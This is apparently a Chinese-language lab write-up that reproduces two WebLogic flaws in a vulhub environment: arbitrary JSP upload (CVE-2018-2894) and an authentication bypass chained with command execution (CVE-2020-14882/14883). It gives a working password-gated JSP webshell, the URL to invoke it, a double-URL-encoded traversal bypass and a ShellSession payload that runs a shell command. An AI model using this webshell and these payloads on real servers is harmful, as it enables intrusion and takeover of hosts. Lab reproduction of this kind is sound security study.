weblogic任意文件上传、未授权命令执行

Weblogic 任意文件上传漏洞（CVE-2018-2894）

reference：[(51条消息) vulhub]Weblogic 任意文件上传漏洞（CVE-2018-2894）__slience的博客-CSDN博客

靶场搭建教学：https://blog.csdn.net/qq_56426046/article/details/126805378

漏洞概述

Weblogic管理端未授权的两个页面存在任意上传jsp文件漏洞，进而获取服务器权限。

Oracle 7月更新中，修复了Weblogic Web Service Test Page中一处任意文件上传漏洞，Web Service Test Page 在 ‘生产模式’ 下默认不开启，所以该漏洞有一定限制。两个页面分别为/ws_utc/begin.do、/ws_utc/config.do。

影响范围

10.3.6
12.1.3
12.2.1.2
12.2.1.3

漏洞复现

docker-compose logs | grep password

从日志里找password关键词，可以找到weblogic账户(为admin权限)密码：C5k7UvM6

登录后台页面，点击base_domain的配置，在 ‘高级’ 中勾选 ‘启用 Web 服务测试页’ 选项，然后保存配置。

启用后保存

​ “/ws_utc/config.do” 是 WebLogic Server 中的一个 URL 路径，用于访问Weblogic控制台中的“Web Services测试页面”。在 WebLogic 控制台中，您可以使用该界面测试 Web 服务以确保其可用性、正确性和一致性。通过向 “/ws_utc/config.do” 发送 HTTP 请求，将获得一个包含界面的 Web 页面。

我们开启了这个服务，我们就能去访问

设置当前工作目录：
/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css访问这个目录是无需权限的，所以在这里写马。它是一个临时目录，用于存储Web服务测试客户端应用程序的CSS文件。

点击安全，然后添加我们的jsp木马。

补充：一般来说，在Weblogic中，“/ws_utc/css/config/keystore/”是用于存储Web服务测试客户端应用程序的某些配置文件和证书密钥库的目录。其中，config 文件夹通常用于存储测试客户端的配置信息，keystore 文件夹则包含了某些私有加密密钥、公共证书及其它安全相关的文件。这些内容在未经适当保护的情况下可能会造成安全风险并遭受攻击。

需要访问http://ip:7001/ws_utc/css/config/keystore/[时间戳]_[文件名]，即可执行webshell，那么就得知道时间戳

可以通过抓包获得时间戳 ,要在上传木马的时候抓包，可以看见时间戳 id=1683620106640

http://10.139.10.152:7001/ws_utc/css/config/keystore/1683620106640_shell2.jsp?pwd=123&i=ls

<%
    if("123".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>

CVE-2020-14882&14883weblogic未授权命令执行

漏洞概述

​ CVE-2020-14882 允许远程用户绕过管理员控制台组件中的身份验证，CVE-2020-14883 允许经过身份验证的用户在管理员控制台组件上执行任何命令。利用这两个漏洞链，未经身份验证的远程攻击者可通过 HTTP 在 Oracle WebLogic 服务器上执行任意命令，并完全控制主机。

漏洞影响

WebLogic 10.3.6.0.0

WebLogic 12.1.3.0.0

WebLogic 12.2.1.3.0

WebLogic 12.2.1.4.0

WebLogic 14.1.1.0.0

CVE-2020-14882复现–权限绕过

​ 补充知识：一般来说，在WebLogic中，“/console”是WebLogic控制台的访问入口，其中 “/console/css/“是用于存储WebLogic管理员控制台的样式表信息。而在您提出的路径字符串中，”%252e” 是对 “.” 符号进行 URL 编码的结果，“%252f” 则是对 “/” 符号进行 URL 编码的结果，这样的编码转换后可以欺骗服务器认为当前请求路径是其上层目录，达到绕过访问权限限制的效果。因此，该请求将尝试通过URI遍历攻击访问到 WebLogic 控制台和配置信息，可能造成系统和应用程序的安全风险。

URL：/console/css/%252e%252e%252fconsole.portal 目录遍历，通过未授权访问，则可以直接绕过验证登录后台。

因为未授权所以没有一些服务

通过这种方法正常登录，服务是全的

通过对比可以看到通过未授权访问的后台与正常登陆的后台差异，由于权限不足，缺少部署等功能，无法安装应用，所以也无法通过后台部署war包等方式直接获取权限。“%252E%252E%252F”为二次url编码的“…/”，通过这个就可以实现穿越路径未授权访问相关管理后台。

CVE-2020-14883复现–后台任意命令执行

知识补充：“com.tangosol.coherence.mvel2.sh.ShellSession” 是一个 类（class）或者说一个Java类的全称，它是 MVEL 表达式库中的一个用于创建本地 shell 会话的 Java 类之一。MVEL 表达式是一种基于 Java 的表达式语言，可以使用它执行一些比较高级的表达式与计算操作。

在某些情况下，攻击者可能会利用 MVEL 表达式注入来执行恶意代码，例如可以向“ShellSession”类注入系统命令并通过该类中关联的 Shell 来执行这些命令。因此，在许多应用程序安全审计和漏洞挖掘过程中，MVEL 表达式的过滤和验证往往也被认为是非常重要的安全防范手段。

远程攻击者可以构造特殊的HTTP请求，在未经身份验证的情况下接管 WebLogic Server Console ，并在 WebLogic Server Console 执行任意代码。

漏洞利用

这个漏洞的利用方式有两种：

​ 一是通过com.tangosol.coherence.mvel2.sh.ShellSession

​ 二是通过com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext。

方法一：

ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(“java.lang.Runtime.getRuntime().exec(‘touch%20/tmp/success1’);”)

Java 命令注入漏洞向量，该漏洞通过 MVEL 表达式 (%{…}) 执行注入命令。其目的是远程执行touch /tmp/success1命令并在/tmp目录下创建一个名为“success1”的临时文件。

发现命令执行成功，进入容器后写入了success1文件

这种利用方法只能在 Weblogic 12.2.1 及更高版本中使用，因为 10.3.6 没有类。com.tangosol.coherence.mvel2.sh.ShellSession

方法二：（）

等我买了服务器再复现。。。

​ 这是一种更为通杀的方法，最早在CVE-2019-2725被提出，对于所有Weblogic版本均有效。